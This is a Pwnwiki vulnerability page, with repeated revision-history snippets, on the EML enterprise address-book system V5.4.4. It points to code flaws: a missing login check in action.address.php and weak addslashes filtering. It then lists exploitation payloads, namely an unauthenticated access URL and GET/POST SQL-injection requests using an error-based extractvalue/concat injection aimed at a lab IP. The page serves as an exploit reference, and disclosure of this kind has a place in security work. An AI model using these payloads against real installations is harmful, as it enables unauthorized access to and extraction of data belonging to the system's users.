Pwnwiki: Created page with "==未授權訪問== action/action.address.php

 header("Content-type: text/html; charset=utf-8");  if(!defined('CORE'))exit("error!");   .....

頁面..."

2021-04-14T04:27:16Z

Created page with "==未授權訪問== <code>action/action.address.php</code> <pre> header("Content-type: text/html; charset=utf-8"); if(!defined('CORE'))exit("error!"); ..... </pre> 頁面..."

New page

==未授權訪問==

<code>action/action.address.php</code>
<pre>
header("Content-type: text/html; charset=utf-8");

if(!defined('CORE'))exit("error!");

.....
</pre>

頁面未加用戶是否登錄判斷，打開頁面是普通用戶權限。（系統是可以註冊的。）

==SQL注入==
<code>lib/func.class.php</code>
<pre>
function _RunMagicQuotes(&$svar){
if(!get_magic_quotes_gpc()) {
if( is_array($svar) ){
foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
}else{
$svar = addslashes($svar);
}
}
return $svar;
}
</pre>

過濾的函數_RunMagicQuotes，判斷是否開啟了get_magic_quotes_gpc，如果開啟就用gpc過濾，如果沒有開啟用addslashes過濾。 5.4.0 始終返回 FALSE，因為這個魔術引號功能已經從 PHP 中移除了。

==漏洞利用==

===未授權訪問Payload===
<pre>
http://192.168.116.138/eml/index.php?action=address
</pre>

===SQL注入Payload===
get方法,判斷注入是否存在:
<pre>
http://192.168.116.138/eml/index.php?action=address&pageNum=/1
</pre>

post方法：
<pre>
http://192.168.116.138/eml/index.php?action=address&pageNum=0

numPerPage=1 procedure analyse(1,extractvalue(rand(),concat(0x7e,version())));
</pre>

EML企业通讯录管理系统经典版V5.4.4 未授權訪問&SQL注入漏洞 - Revision history

Pwnwiki: Created page with "==未授權訪問== `action/action.address.php`
header("Content-type: text/html; charset=utf-8"); if(!defined('CORE'))exit("error!"); .....
頁面..."

EML企业通讯录管理系统经典版V5.4.4 未授權訪問&SQL注入漏洞 - Revision history

Pwnwiki: Created page with "==未授權訪問== action/action.address.php header("Content-type: text/html; charset=utf-8"); if(!defined('CORE'))exit("error!"); ..... 頁面..."

Pwnwiki: Created page with "==未授權訪問== `action/action.address.php`
header("Content-type: text/html; charset=utf-8"); if(!defined('CORE'))exit("error!"); .....
頁面..."